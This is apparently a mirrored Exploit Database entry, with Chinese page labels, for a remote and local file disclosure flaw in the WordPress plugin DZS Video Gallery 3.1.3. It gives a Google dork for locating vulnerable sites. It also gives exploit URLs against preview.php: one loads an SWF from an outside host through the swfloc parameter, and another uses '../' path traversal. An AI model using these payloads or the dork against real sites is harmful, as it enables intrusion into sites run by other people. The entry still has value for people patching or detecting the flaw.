WordPress Plugin DZS Video Gallery 3.1.3 – Remote File Disclosure / Local File Disclosure

• Exploit Database
• 12 阅读

• 作者： aceeeeeeeer .
  日期： 2013-12-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30063/

• # Exploit Title: WordPress DZS Video Gallery (dzs-videogallery) 3.1.3 Plugins Remote and Local File Disclosure Vulnerability (only .SWF)
  # Google Dork: inurl:/wp-content/plugins/dzs-videogallery/
  # Vendor Homepage: http://digitalzoomstudio.net/
  # Version: ALL
  # Affected File: preview.php
  # Date: 03/12/2013
  # Exploit Author: aceeeeeeeer
  # Contact: http://www.twitter.com/aceeeeeeeer
  # Tested on: Linux
  
  Exploit:
  /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=[
  SWF LINK ]
  
  http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=http://www.cristgaming.com/pirate.swf
  http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../uploads/2013/12/The_Exorcist.swf